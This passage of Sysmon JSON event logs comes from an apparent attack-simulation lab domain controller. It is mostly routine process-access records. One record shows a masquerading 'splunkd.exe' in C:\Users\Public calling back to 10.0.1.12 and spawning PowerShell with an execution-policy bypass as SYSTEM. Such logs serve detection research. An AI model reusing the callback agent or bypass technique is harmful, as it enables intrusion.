05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1715,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1716,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1717,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1718,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1719,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1720,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.813\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-0010376B0300}\r\nTargetProcessId: 3872\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.813","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-0010376B0300}","TargetProcessId":"3872","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1721,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.837\r\nProcessGuid: {A837DB8D-01C6-5F25-0000-0010DD6D0300}\r\nProcessId: 3892\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: powershell.exe -ExecutionPolicy Bypass -C pqlibi\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {A837DB8D-01BD-5F25-0000-00108F930200}\r\nParentProcessId: 3048\r\nParentImage: C:\\Users\\Public\\splunkd.exe\r\nParentCommandLine: \"C:\\Users\\Public\\splunkd.exe\" -socket 10.0.1.12:7010 -http http://10.0.1.12:8888 -contact tcp ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.837","ProcessGuid":"{A837DB8D-01C6-5F25-0000-0010DD6D0300}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"powershell.exe -ExecutionPolicy Bypass -C pqlibi","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{A837DB8D-01BD-5F25-0000-00108F930200}","ParentProcessId":"3048","ParentImage":"C:\\Users\\Public\\splunkd.exe","ParentCommandLine":"\"C:\\Users\\Public\\splunkd.exe\" -socket 10.0.1.12:7010 -http http://10.0.1.12:8888 -contact tcp ","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1722,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.837\r\nSourceProcessGUID: {A837DB8D-01BD-5F25-0000-00108F930200}\r\nSourceProcessId: 3048\r\nSourceThreadId: 2420\r\nSourceImage: C:\\Users\\Public\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-0010DD6D0300}\r\nTargetProcessId: 3892\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Users\\Public\\splunkd.exe+5c36e","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.837","SourceProcessGUID":"{A837DB8D-01BD-5F25-0000-00108F930200}","SourceProcessId":"3048","SourceThreadId":"2420","SourceImage":"C:\\Users\\Public\\splunkd.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-0010DD6D0300}","TargetProcessId":"3892","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Users\\Public\\splunkd.exe+5c36e","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1723,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.837\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-0010DD6D0300}\r\nTargetProcessId: 3892\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.837","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-0010DD6D0300}","TargetProcessId":"3892","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1724,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.837\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: 